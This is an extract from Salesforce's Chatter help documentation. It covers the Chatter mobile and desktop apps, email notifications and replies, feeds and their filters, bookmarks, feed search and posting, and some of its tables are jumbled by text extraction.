• Invite people to join your Chatter network if they don't have Salesforce licenses to use Chatter.
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CHATTER FOR MOBILE

Chatter Mobile App Overview
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

The Chatter mobile app lets you collaborate in Chatter from your mobile device as follows:

• Receive updates about the people and records you follow and your groups.

• View and create posts and comments.

• Post photos from your device.

• Find and follow people in your organization.

• Find and join groups in your organization.

• View your coworkers' profiles to see their contact information, bio, who they're following, and who's following them.

• Email, call, or text people directly from their Chatter profiles.

The Chatter mobile app is free and available for:

• Android phone or tablet with OS 2.2 or higher

• Apple iPad with iOS 5.0 or higher

• Apple iPhone and iPod Touch with iOS 5.0 or higher

• BlackBerry device with OS 5 or higher

Download the Chatter mobile app from either www.salesforce.com/mobile/apps/download/ or the online location
where you typically download apps for your phone, such as Apple App Store, Google Play Store, or BlackBerry World.
Customers that manage BlackBerry devices with a BlackBerry Enterprise Server can use Application Push to remotely deliver
the Chatter mobile app to users. Navigate to downloads.salesforce.com/downloads/mobile/index.html and
click BESpush under Chatter Files and Tools to download the Application Push package.

The Chatter mobile app is enabled for use in most organizations by default. If it is not enabled in your organization or you
want to change the default settings, see Configuring the Chatter Mobile App.

See Also:
Using Chatter Desktop
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What are push notifications? How do I enable or disable
them for Chatter Mobile?

Push notifications are alerts that apps send to your mobile device's home screen when you're not using the app. These alerts
can consist of text, icons, and sounds, depending on your device type. The Chatter mobile app uses push notifications to keep
you aware of important Chatter activity without requiring you to return to the app. A setting controls whether or not you
receive Chatter push notifications; however, you can't enable push notifications if they were disabled by your administrator.

To learn about enabling or disabling push notifications, visit the Chatter mobile app help site from your device.

See Also:
Configuring Chatter Email Notifications and Digests

Can Chatter customers from Customer Groups use the
Chatter mobile app?

Chatter customers can download the Chatter mobile app to use Chatter from their device. The Chatter mobile app applies
the same restrictions to customer users as Chatter on the Web.

Chatter Customers are users outside of your company’s email domains, who have access to private groups with customers. In
the Chatter mobile apps for BlackBerry, Android, and iOS, the names and profiles of customer users can be viewed by people
inside your company's domain.

See Also:
About Chatter Customers in Private Groups

CHATTER DESKTOP

Chatter Desktop Overview
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter Desktop is a free desktop application that lets you collaborate in Chatter without a browser. Use Chatter Desktop to
post and comment in Chatter, and receive updates about your groups and the people, records, and files you follow. Chatter
Desktop also supports chat, private Chatter messages, and displays Chatter updates and private messages as popup notifications
in your Windows taskbar or Mac OS X Dock.
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Note: Customer users can install and use Chatter Desktop but can’t access all of its functionality. For example,
customer users can’t follow users or records, chat, or access administration options.

See Also:
Chatter Mobile App Overview

Installing Chatter Desktop
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Salesforce.com provides two Chatter Desktop installers: a standard version for individual installations and a managed version
for enterprise deployments.

The following are the minimum requirements for using Chatter Desktop:

• Windows

◊ 2.33GHz or faster x86-compatible processor, or Intel Atom™ 1.6GHz or faster processor for netbook devices

◊ Microsoft® Windows® XP, Windows Server® 2003, Windows Server 2008, Windows Vista® Home Premium, Business,
Ultimate, or Enterprise (including 64 bit editions) with Service Pack 2, or Windows 7

◊ 512MB of RAM (1GB recommended)

• Mac

◊ Intel® Core™ Duo 1.83GHz or faster processor

◊ Mac OS X v 10.5, 10.6, or v10.7

◊ 512MB of RAM (1GB recommended)

Important: Chatter Desktop uses Adobe® Integrated Runtime (AIR®), Adobe's cross-platform runtime environment
for desktop applications, and only runs on operating systems that Adobe AIR supports. Chatter Desktop does not
run on operating systems that Adobe AIR does not support, such as 64-bit Linux. See the Adobe website for
information on Adobe AIR.

The standard version:

• Requires administrator privileges on your machine

• Doesn’t require administrator privileges in Salesforce

• Automatically installs the required version of Adobe® Integrated Runtime (AIR®)

• Requires acceptance of an end user license agreement the first time Chatter Desktop launches

• Posts “Installed Chatter Desktop” to Chatter the first time Chatter Desktop launches

• Periodically checks Salesforce for new versions

To install the standard version:

1. From Setup, click Desktop Integration > Chatter Desktop.
2. Click the Download Now badge.
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3. Follow the on-screen instructions.

Note:  Administrators can disable the Chatter Desktop download page and block users from accessing Chatter
Desktop.

Important: Chatter Desktop uses Adobe® Acrobat® Reader to preview PDF files. Before previewing files with
Chatter Desktop, download Adobe Acrobat from Adobe's website, install it, and open it at least once to complete
the installation.

Connecting Chatter Desktop
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

If you have multiple Salesforce or Chatter logins, create a connection for each login. The connection lets Chatter Desktop
access the Chatter data you can access with that login on the Web.

1. Click  and select Settings.
2. In the Connections section, enter a name for the connection and the URL from which you log in. The URL must begin

with https:// and end with salesforce.com or chatter.com. For example, if your organization has a European
division that you log into from https://emea.salesforce.com, enter that URL and name the connection Europe.

By default, Chatter Desktop connects to your main instance of Salesforce (Production) or your Force.com sandbox.

3. Click Authorize and follow the on-screen instructions to authorize Chatter Desktop to connect using the login.

Use the radio buttons on the Settings screen to specify a default connection. To quickly switch connections while using Chatter

Desktop, click , select Switch Connection, and choose the connection.

Note:  You can create multiple connections, but Chatter Desktop can log into only one connection at a time. You
cannot use Chatter Desktop to display data from multiple connections simultaneously.

See Also:
Configuring Chatter Desktop

Configuring Chatter Desktop
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The default Chatter Desktop configuration is appropriate for most users, but several Chatter Desktop settings are configurable.

To access Chatter Desktop settings, click  and select Settings. From the Settings screen, you can:

• Configure Chatter Desktop to launch when you start your computer.
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• Configure Chatter Desktop to minimize when you close it.

• Turn popup notifications on or off. Popup notifications are enabled by default.

• Manage alerts for new feed posts and comments (advanced settings).

• Configure Chatter Desktop to always display in the foreground (advanced settings).

• Move the chat window to the foreground when you receive a new message.

• Play sounds when someone starts a new chat with you, or play a sound for every chat message when a chat is minimized
or out of focus (for example, if you have multiple chats or are using another application).

• Edit your connections.

See Also:
Troubleshooting Chatter Desktop

Troubleshooting Chatter Desktop
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter Desktop uses Adobe® Integrated Runtime (AIR®), so see the following table for solutions to common AIR-related
issues if you need to troubleshoot Chatter Desktop. Use the Adobe® knowledge base if the table does not have the answers
you need.

SolutionProblem

Change your default browser to another application and then
back to your preferred browser. This ensures that your

Chatter Desktop installation fails.

operating system opens the Chatter Desktop installation files
correctly.

Try the following:Chatter Desktop on Linux freezes, presents an empty window,
does not save your password, or malfunctions in another way. • If using the managed installation, verify the

.chatterdesktop file is well-formed and valid XML.
• If using the managed installation, verify the URLs in the

.chatterdesktop file are valid, and that each URL
begins with https:// and ends with salesforce.com.

• Troubleshoot your Encrypted Local Storage (ELS)
keystore. See
http://kb2.adobe.com/cps/492/cpsid_49267.html.

Chatter Desktop uses Adobe® Acrobat® Reader to preview
PDF files. Before previewing files with Chatter Desktop,

Chatter Desktop does not preview PDF files.

download Adobe Acrobat from Adobe's website, install it,
and open it at least once to complete the installation.
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SolutionProblem

Click the sync icon.Photos with comments do not refresh.

See Also:
Configuring Chatter Desktop

Disabling Chatter Desktop Remotely
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

If the computer on which you installed Chatter Desktop is stolen or lost, you can block Chatter Desktop from accessing your
Salesforce data.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Details.

3. Click Revoke next to Chatter Desktop in the Remote Access section.

See Also:
Troubleshooting Chatter Desktop

Chatter Desktop Releases
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

This table describes the updates in each Chatter Desktop release.

UpdatesVersion

3.2 • Configure desktop alerts for new feed posts and comments

• Configure Chatter Desktop to always display in the
foreground

• Delete feed posts if you have access

• Post in all public groups

• Scrolling and active links supported in group descriptions
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• Miscellaneous bug fixes including negative counts and
names displayed twice in likes and broken hash tag topic
links.

3.1.1 • Installer certificate update

3.1 • Attach files to comments

• View your chat list sorted by first name

• View the last activity date for your groups

• View multiple chats more easily

• Sort your chat favorites by people’s availability

• See improved icons for your Chatter feed and dragging
and dropping files to your posts

3.0 • Chat with one or more people in your organization

• Like comments

• View a list of people who like a post or comment

• View files attached to comments

• View dashboard snapshots

• View shared messages

• Several miscellaneous bug fixes, including feed
improvements using new components and an issue that
prevented adding an @mention after a #topic

2.1 • Support for customer users

• Support for private Chatter messages

• Miscellaneous bug fixes, including an issue with popup
notifications stealing OS focus

2.0 • A new user interface and visual design

• View records

1.3.3 • Global search for @mentions

• Create new instances on the Login screen

• Switch and authenticate instances without restarting

• Miscellaneous bug fixes, including an issue that generated
empty notifications and an issue with the installer

1.3.2 • An intermediate build to accommodate changes to Adobe
AIR. Chatter Desktop immediately performs an additional
update after 1.3.2 installs.

1.2.1 • Locale fixes for Norwegian, Danish, Finnish and Dutch
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1.2.0 • User and group details

• Links to indicate you like a post

• @mentions, which render in feeds and link to the
mentioned user's profile

• #topics, which render in feeds and link to search results in
your browser

• Auto-complete for @mentions and #topics

• Performance improvements including image caching

• Norwegian language support

• Miscellaneous bug fixes

1.1.1 • Updated for use with chatter.com

• Minor bug fixes

1.1.0 • Click files to preview them

• Select the To:Me tab to see posts directed to you

• Click groups and users to view their walls

• Write on the walls of groups and users

1.0.7 • Photo loading issue resolved

1.0.6 • Performance optimizations for people and groups

• Release of Chatter Desktop managed version

1.0.5 • An option to log into your Developer Sandbox

• Performance optimizations

• Korean locale fixes

See Also:
Installing Chatter Desktop

The People and Records You Auto-Follow Initially
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Starting in June 2010, when your administrator initially turns on Chatter, we help get you started by automatically following
certain users and records in your organization. Who and what you auto-follow differ based on the size of your organization:
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Records You FollowUsers You FollowIf Your Organization
Has:

Up to 25 of your most recently used records, in the
following order:

All users in your organization15 users or fewer

1. Open opportunities you own
2. Accounts you own
3. Open cases you own
4. Contacts you own
5. Open opportunities you created
6. Accounts you created
7. Open cases you created
8. Contacts you created
9. Open opportunities you last modified
10. Accounts you last modified
11. Open cases you last modified
12. Contacts you last modified
13. Open opportunities you viewed
14. Accounts you viewed
15. Open cases you viewed
16. Contacts you viewed

Up to 25 of your most recently used records, in the
following order:

Up to 25 users in your organization,
including (if available):

16 or more users

1. Open opportunities you own• Your manager
2. Accounts you own• Users that report to your manager
3. Open cases you own• Your subordinates
4. Contacts you own• Teammates on your account teams
5. Open opportunities you created• Teammates on your opportunity

teams 6. Accounts you created
7. Open cases you created
8. Contacts you created
9. Open opportunities you last modified
10. Accounts you last modified
11. Open cases you last modified
12. Contacts you last modified
13. Open opportunities you viewed
14. Accounts you viewed
15. Open cases you viewed
16. Contacts you viewed

Note:  The auto-follow setting for records only applies to the records that already exist at the time your administrator
turns on Chatter. For any future records you create, auto-follow is disabled by default to reduce the number of updates
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you receive in your Chatter feed. However, if you want to receive updates on all future records you create, you can
enable auto-follow in your personal settings.

See Also:
People Recommendations
Record Recommendations
Automatically Following Records You Own

Liking Posts and Comments
Like posts or comments to show your support and receive email notifications if others comment on that post.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Below a post or comment, click Like.

After you click Like on a post, you receive email notifications if others comment on that post. If you click Like on a comment,
only the user who posted the comment receives an email notification, but you receive an email notification for any subsequent
comments.

• To stop liking a post or a comment, click Unlike. When you stop liking a post or a comment, you don’t receive email
notifications for subsequent comments or likes.

• View the profiles of others who have liked a post by clicking their name at the bottom of the post or comment, for example,
“John Smith likes this.”

• If more than three people like a post, click the link to see the full list; for example, “You, John Smith, and 2 others like
this.” From that list, you can follow or stop following people.

• Likes on comments show how many people have liked the comment, for example, “1 person” or “7 people”. To see their
names, click the link.

See Also:
Configuring Chatter Email Notifications and Digests

Replying to Chatter Email Notifications
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

When you receive certain email notifications, you can conveniently perform some actions by replying directly from your email.
You can reply to the types of email listed in the table, or any notification that displays a From address of
reply@chatter.salesforce.com.

2329

Liking Posts and CommentsCollaborate within Your Company



Note:  To reply to email notifications, your administrator must enable email replies for your organization.

LimitsText to Include in Your ReplyType of EmailAction

N/AbookmarkSomeone posted to your
profile or a group, mentioned

Bookmark a post

you in a post, or shared your
post

1,000 characters maximum.
Replies that exceed the limit

The text of your commentSomeone posted, commented
on your post, also commented

Comment on a post

are truncated to the first 1,000
characters.

after you, or mentioned you in
a post or comment

N/AfollowSomeone posted, commented
on your post, also commented

Follow someone

after you, or mentioned you in
a post or comment

N/Alike or +1Someone commented on your
post or also commented after
you

Like a comment

N/Alike or +1Someone posted to your
profile or a group, mentioned

Like a post

you in a post, or shared your
post

10,000 characters maximum.
Replies that exceed the limit

The text of your responseSomeone sent you a messageRespond to a Chatter message

are truncated to the first
10,000 characters.

N/AunfollowSomeone posted, commented
on your post, also commented

Unfollow someone

after you, or mentioned you in
a post or comment

N/Aunlike or –1Someone posted, commented
on your post, or also

Unlike a post

commented after you on a post
that you previously liked

Consider these tips when sending email replies.

• Replies must be sent from the email address specified on your profile. If you use email aliases or email forwarding services
that send replies from a different email address, your replies won't be processed.

• Replies to bookmark, like or unlike, and follow or unfollow must contain only the single word or exact text, such as like
(case insensitive) or +1. If you include extra white spaces or the original message that some email applications automatically
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include, we ignore them and process the reply as a like, bookmark, etc. However, if you include any other text in the body,
such as Like! or Like this?, we process your reply as a comment rather than a like, bookmark, etc.

• If replies contain your personal email signature, the signature text is treated as part of your comment. Default signatures
inserted by mobile devices, such as Sent from my iPhone, are automatically removed from replies. Before replying,
delete custom signatures and any extra text you don't want posted to Chatter.

• Attachments in replies are ignored.

• Before replying, check the email address that displays in the To field of your email. Valid addresses contain tokens, or long
character strings, both before and after the @ symbol, such as
w8t27apy1@j321imd9gbs.d8rx.d.chatter.na1.salesforce.com. Some email applications may automatically
use the From address from the original email, reply@chatter.salesforce.com, which is not a valid address for
receiving replies. If you see this shortened address in the To field of your reply email, replace it with the valid reply-to
address in the email header information. For example, in an application such as IBM® Lotus Notes®:

1. Open the original email.
2. Click View > Show > Page Source.
3. In the Reply-To section, copy the email address that looks like:

w8t27apy1@j321imd9gbs.d8rx.d.chatter.na1.salesforce.com.
4. Paste the reply-to address in the To field of your reply email.

See Also:
Liking Posts and Comments

Configuring Chatter Email Notifications and Digests
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter can email you every time someone follows you, posts to your profile or groups, and more. You can also receive daily
or weekly user and group email digests. User digests include the updates you see in your own Chatter feed, such as updates
about the people, records, and files you follow and your groups. Group digests include the updates you see in a particular
group’s Chatter feed, and are configurable on a group-by-group basis.

Note:  To receive Chatter email notifications and digests, your administrator must enable email notifications for your
organization.

To configure your Chatter email settings:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Chatter Setting > Chatter Email Settings.
• If you clicked My Settings, select Chatter > Email Notifications.

3. Select Receive emails to receive Chatter email.
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Warning:  Deselecting this option prevents you from receiving all Chatter email notifications.

4. Select the types of Chatter email you want to receive.
5. Click Save.

Consider these email notification tips.

• When configuring your user and group digests, specify whether you want to receive each digest daily or weekly. Daily
digests include the 50 latest posts from the previous day while weekly digests include the 50 latest posts from the week.
Both include the three latest comments on each post. Alternatively, when configuring group digests, you can choose to
receive an email every time someone posts to the group.

• Chatter sends daily digests at approximately 12:00 a.m. every day, and weekly digests at approximately 12:00 a.m. on
Sunday. For user digests, the time is according to the user's time zone. For group digests, the time is according to the
organization's time zone.

• If you configure Chatter to send digests but you don't receive any, it's likely that the people and items you're following
have no new updates.

• Whenever you join or are added to a group, you don't receive email notifications initially because they're turned off by
default. You can use Set default frequency for groups I join: to choose how often you want to receive
emails when joining new groups. Changing the default frequency doesn't affect the groups you already belong to.

Note: If your organization existed prior to the Summer '11 release and is a Professional, Enterprise, Unlimited,
or Developer Edition organization, you may still be receiving daily digests by default.

• If you select Comments on a post on my profile, you don't receive a notification when someone comments on
changes an administrator makes to your profile.

• If you select Comments after me or Comments on an item I like, you receive email notifications for up to 10
comments after yours. Commenting again later in the post resets the count and allows you to receive email notifications
for up to another 10 subsequent comments.

• If you select Sends me a message, you receive email notifications when people send you Chatter messages, including
notifications about files that have been shared with you.

• Chatter limits the number of email notifications an organization can send each hour. These limits are subject to change.

See Also:
Sending Chatter Messages
Sharing Files with People

What do “company” and “organization” mean in Chatter?
An organization is a single deployment of Salesforce with a defined set of licensed users who may or may not use Chatter.
The words “company” and “organization” are used interchangeably in Chatter. So for example, if you see “share a file with all
Chatter users in your company,” it means you're sharing with everyone in a specific Salesforce organization who uses Chatter.

See Also:
Chatter Overview
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Can I invite people from my company who don't have
Salesforce licenses?

If enabled by your administrator, you can invite other people from your company. Invited users can view profiles, post on their
feed, and join groups, but can't see your Salesforce data or records.

You can invite users from the People tab or when adding members to a group.

Additionally, you can add customers to private groups you own or manage.

WORK WITH FEEDS

Feeds Overview
Chatter feeds show you posts and comments you and other people make, as well as record updates across your Salesforce
organization.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Watch a Demo: Getting the Most Out of Chatter Feeds (2:32 minutes)

You must follow people and records to see their updates in your Chatter feeds. Chatter feeds display on profiles, groups, the
Home tab, topic detail pages, and on record detail pages.

The feed updates you see depend on how your administrator has configured feed tracking. Sharing rules and field-level security
determine the record changes you see in Chatter feeds. For example, if you don’t have access to a record, you don’t see any
updates for that record. Typically, you see feed updates for:

• Record field changes, like changes to record owner and closed opportunities and cases

• Tasks and events

• Converted leads

• Chatter feed comments and posts

• Shared files and links

• Posts, comments, and files on Chatter groups you're a member of

Tracked feed updates that are older than 45 days and have no likes or comments are deleted automatically.

See Also:
Sharing a Chatter Post
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Viewing a Particular Feed
Change your Chatter feed to display a particular subset of posts.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

By default, you see your What I Follow feed when you go to your Chatter page. Use the feed selections on the left sidebar of
the Chatter page to display a subset of posts in your feed, like only posts that mention you, or posts you bookmarked, or all
posts in your company.

1. Click Feed to see the available feeds.
2. Click a feed to display the associated subset of posts in your feed.

What I Follow

Displays updates for everything you follow, including posts from people you follow, groups you are a member of,
and files and records you’re following. Use the drop-down list at the top of your feed to further narrow the subset of
posts.

To Me

Displays posts others make on your profile page and posts and comments where you have been mentioned.

Bookmarked

Displays your bookmarked posts in your feed.

All Company

Displays all posts and comments from your entire company. This includes posts and comments from:
• People in your company, the ones you follow and the ones you don’t follow
• Public groups, including the ones you aren’t a member of
• Private groups you are a member of
• Feed tracked changes for records and fields, including the ones you’re not following. You can only see the feed

tracked changes for records you have access to and for fields that your administrator configured for tracking.

See Also:
Filtering Your Files List

Filtering Your Chatter Feed
Use filters to condense the number of posts that appear in your Chatter feed.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions
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You can only filter your feed on the Chatter page and on record detail pages. The filters are not available on your profile or
on group feeds.

Above your feed on the Chatter page, click the down arrow next to Show and select a filter from the drop-down list.

All Updates
Displays all posts and comments from people and records you follow and groups you’re a member of. This filter is selected
by default.

Fewer Updates
Displays all posts and comments from people and records you follow and groups you’re a member of, but hides
system-generated posts from records that nobody commented on.

System-generated posts are updates that Salesforce automatically generates when someone creates a new record or changes
a tracked field on a record. For example, let’s say you’re following the Acme account. The account executive for Acme
creates a new opportunity. Later, the account executive also changes a tracked field on the Acme account. In both cases,
Salesforce automatically generates an update about each change and posts the updates in your Chatter feed and the feed
on the Acme account detail page. The Fewer Updates filter hides these system-generated posts in your feed, unless
someone has commented on the posts. If you want to see the system-generated posts, select the All Updates filter.

People
Displays the posts and comments from people you follow.

Groups
Displays the posts from groups you’re a member of.

Files
Displays posts that include files you follow and posts with files that someone you follow commented on.

Note:  Depending on how your administrator has set up your Salesforce application, you may see additional filters
to the ones described here.

Filtering Your Record Feed
Use the drop-down filters above the feed on a record page to condense the number of posts that display in your record feed.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Above the feed on a record page, click the down arrow next to Show and select a filter from the drop-down list.

All Updates
Displays all posts on the record.

Fewer Updates
Hides the system-generated record posts that nobody commented on.

Salesforce automatically generates a post when someone creates a new record or changes a tracked field on a record. For
example, let’s say you’re following the Acme account. The account executive for Acme creates a new opportunity. Later,
the account executive also changes a tracked field on the Acme account. In both cases, Salesforce automatically generates
an update about each change and posts the updates in your Chatter feed and the feed on the Acme account detail page.
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The Fewer Updates filter hides these system-generated posts in your feed, unless someone has commented on the posts.
If you want to see the system-generated posts, select the All Updates filter.

Note:  Depending on how your administrator has set up your Salesforce application, you may see additional filters
to the ones described here.

Sorting Your Feed
The Sort by drop-down list at the top of your feed sorts the feed by most recent posts or by most recent posts with comments,
including polls with new comments.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Click Sort by at the top of your feed.
2. Select Post Date to sort by most recent posts, or Most Recent Activity to sort by posts with the most recent comments,

including polls with new comments.

Your feed is sorted by Most Recent Activity by default. You can toggle between sorting by Post Date and Most Recent
Activity at any time.

Tip:  If you want to keep track of a particular post, use bookmarks. Bookmarks help you find a post quickly, even if
the post doesn’t have any recent comments.

See Also:
Viewing a Particular Feed

FEEDS FAQS

I see updates to private groups in my profile feed. Who
else can see these updates?

Only the members of a private group can see updates to that group, even on your profile feed.

See Also:
Post Visibility
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Can I see a list of records and people I'm following?
To see people and records you follow, view the Following list on your profile and filter the results by user or by an object type.
You can also see a list of people following you in the Followers list on your profile.

See Also:
Profile Overview

Why do I only see certain people and records in my Chatter
feed?

You only see updates by people and records that you follow. Follow more records and people to see more updates in your
Chatter feed on your Home tab and Chatter tab. Click People on the Chatter tab to find a list of people in your organization
to follow or unfollow.

See Also:
The People and Records You Auto-Follow Initially

BOOKMARK POSTS

Bookmarks Overview
Bookmarking lets you keep track of individual posts you’re interested in.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

After you bookmarked a post, you can quickly find it in your feed using the Bookmarks filter on the left sidebar. The Bookmarks
filter shows you only the posts you bookmarked.

When someone comments on a post you bookmarked, you receive an email notification. Email notifications for bookmarks
are enabled by default, but you can change your email notifications in your Chatter Email Settings.
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Bookmarks are private and other users can’t see which posts you bookmark. There is no limit on the number of bookmarks
you can add. When you are no longer interested in a post you saved, you can remove the bookmark and the post no longer
appears in your saved posts when you click Bookmarks.

See Also:
Liking Posts and Comments
Viewing a Particular Feed

Bookmarking a Post
Bookmarking a post lets you keep track of posts you’re interested in.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Click  at the top right corner of the post you want to bookmark to expand the drop-down menu.
2. Click Bookmark.

The bookmark icon ( ) displays next to the post to indicate that you successfully saved the post to your bookmarks.

Click Feed > Bookmarked on the Chatter sidebar to see your saved posts in your feed.

There is no limit for the number of bookmarks. You can add as many bookmarks as you like.

See Also:
Liking Posts and Comments

Removing a Bookmark
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Click Feed > Bookmarked on the sidebar to see your saved posts in your Chatter feed.
2. Find the saved post in your Chatter feed.

3. Click  at the top right corner of the post to expand the drop-down menu.
4. Click Remove Bookmark.

When you remove a bookmark from a post, the post no longer appears in your saved posts when you click Bookmarked.

See Also:
Configuring Chatter Email Notifications and Digests
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Viewing Your Recommendations
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter provides recommendations to help you identify the people, groups, files, and records that closely relate to your job
and interests. The more recommendations you accept, the more updates you see in your feed.

• Click Follow next to the person, record, or file you want to follow.

• Click Join to become a group member.

• Click  to dismiss a recommendation.

• Click More to display the Recommendations page where you can use the side filters to narrow your recommendations to
people, files, records, or groups.

FIND INFORMATION IN FEEDS

Searching in Feeds
Quickly find information in posts and comments across Chatter.

• Use the header search box (Global Search) to find information in feeds across Chatter.

•
To find information in a specific Chatter feed, use feed search ( ) in that context.

• To create a quick shortcut to a frequently performed search in Chatter, save a feed search as a favorite and click the favorite
link from the Chatter page.

Chatter Feed Search Results
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Watch a Demo: Using Smart Search (2:12 minutes)

Search results for Chatter feeds display posts and comments that include your search terms.

Chatter feed searches aren’t affected by your search scope; Chatter feed search results include matches across all objects.

Note:  Changes to record fields aren't included in search results. For example, if you've enabled feed tracking on the
Billing Address field for the Acme account and modified the Acme billing address, search results for Acme
include Acme — Suzanne Powell Looking for volunteers to help with the Acme account, but don't include Acme — Suzanne
Powell changed Billing Street to 10 Main Road.
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• Sort your search results by posts only or by posts and comments, just as in feeds.

• Comment on, like, share, bookmark, and delete posts in the search results, just as in feeds.

• Add, edit, or delete topics on posts in the search results, just as in feeds.

• Follow, share, download, preview, and upload new versions of files in the search results, just as in feeds.

• View the detail pages for Chatter files, groups, topics, and people by clicking the respective name in the update.

• View a single feed update by clicking the timestamp below the update, for example, Yesterday at 12:57 AM.

• Click Add to Favorites to save a Chatter feed search to your favorites on the Chatter tab.

To view search results for records, such as accounts, contacts as well as Chatter people, groups, topics, and files, click Records
at the top left of the page.

Tip:  For a more focused search of the feeds in a specific group, profile, record, or other Chatter feed, use feed search.

Searching in a Specific Feed
Use feed search to find information in a feed in a specific context.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can search for information in feeds on a user’s profile, a record, in a public or private group (if you’re a member), and on
the Chatter and Home tabs. A contextual feed search is helpful when you want to confirm or check if something was once
discussed in that specific feed.

1. Click  above the feed to look for information in that feed. For example, use the feed search on a group’s page to find
information in that group.
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2. Type your search terms and press ENTER or click .

You can search for hashtag topics, mentions, and files posted in the feed, or refine your search using wildcards, operators,
and quotation marks to match on exact phrases.

Tip: To search for hashtag topics with multiple words, use brackets after the hashtag and around the words. For
example, to find all instances of #Universal Paper, type #[universal paper] in the search box.

Search results display with matching terms highlighted. Filters or sorting criteria used in the feed apply to feed search
results as well.

Click  to clear your search results and return to the feed.

Feed search behavior may vary slightly depending on where you perform the search.

• Feed search is not supported for feeds on list views or topic feeds.
• You can only search feeds you have access to via sharing rules.
• On the Chatter tab, feed search results are also limited by your feed type selections. For example, if you select the To Me

feed type, and select additional filters and sorting criteria, all of those criteria apply to the feed search results.
• Feed search results are limited to the posts that are accessible from the context you search within. For example, if you

search the feed on a user’s profile, the results include the posts and comments accessible from the user’s profile. This
includes both the posts and comments shared by or with the user.

• Feed search returns matches for file or link names shared in posts, but not in comments.
• Record field changes aren’t included in record feed search results.

Adding a Chatter Feed Search as a Favorite
Add a Chatter feed search as a favorite to access feed updates quickly without leaving the Chatter tab.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions
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1. Enter terms in the header search box and click Search.
2. Click Search Feeds to see the posts and comments that include your search terms.
3. Click Add to Favorites.

The favorite name on the Chatter page is the same as the search terms you entered. For example, if you searched for
competitive analysis, your favorite is competitive analysis.

Tip:  Save a search for a Chatter group name as a favorite to quickly access the group feed from the Chatter page.
Similarly, save a search for a person's name as a favorite to quickly see that person's posts, comments, and mentions.

See Also:
Chatter Feed Search Results

Chatter Favorites Overview
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter favorites on the Chatter tab give you easy access to list views, Chatter feed searches, and topics that you want to stay
on top of. For example, if you and your coworkers use the hashtag topic #acme to track information about your customer
Acme, you might want to add #acme as a favorite so you can easily access these updates without leaving the Chatter tab.

You can have up to 50 favorites. If you haven't added any favorites, the Favorites section doesn't appear on the Chatter tab.

Chatter displays the four favorites most recently added or viewed.

• Click a favorite to see the updates.

• Click X more to see all your favorites.

• Click , which appears on hover, to remove a favorite.
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CONTRIBUTE TO FEEDS

CREATE POSTS

Posts
Write a post to share information and collaborate with other people inside and outside your organization.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Posting is a great way to collaborate with other people. Write a post to tell people what you are working on, ask questions, or
answer someone else’s question in a comment to their post. You can also attach a file or link to your post, add topics, or mention
someone.

You can collaborate with people inside and outside your company. For example, post to a group that allows you to share
information with customers.

Posts and comments can be up to 1,000 characters long.

See Also:
Making a Post
Deleting a Post

Making a Post
Make a post to let people know what you are working on, to ask questions, and share information.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

1. Above your feed, click Post or just click the text box.
2. Type your update in the text box.

You can add hashtag topics and mention people.

3. Below the text box, select My Followers to publish the post on your profile, or select A Group, type part of the group’s
name in the Search Groups field, and select the group from the drop-down list. You can only select a group you’re a member
of.

4. Click Share.
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Immediately after posting, you can add topics to help organize your posts or increase their visibility.

See Also:
Deleting a Post
Post Visibility

Deleting a Post
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

You can only delete your own posts.

1. Next to the post, click  to expand the drop-down menu.
2. Click Delete to delete the post and all its comments.

When you delete a post that includes a file, you’re not deleting the file, just the reference to the file; the file remains in its
original location.

Post Visibility
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The following table describes where you can post and where your post displays.

File ConsiderationsWhere does my post
show up

Who gets my post
directly

I can post toI’m posting on

If you attach a file to
the post, the file is

My followersHome tab, Chatter tab,
or my profile

•• Everyone who
navigates to your
profile can see your
post on your profile.

People following
you see your post in
the What I Follow
feed.

available to all
employees. The file also
shows up in search
results and file lists.

•• Your post shows up
in feed search
results.

People that are
mentioned in the
post see the post in
the What I Follow, • Everyone can see

your post in the All
Company feed.

To Me, and profile
feeds.

If you attach a file to
the post, the file is

A public group •• Everyone who
navigates to the

Members of this
group see your post

available to anyone whogroup can see yourin the What I
Follow feed. has access to the group.

The file also shows up
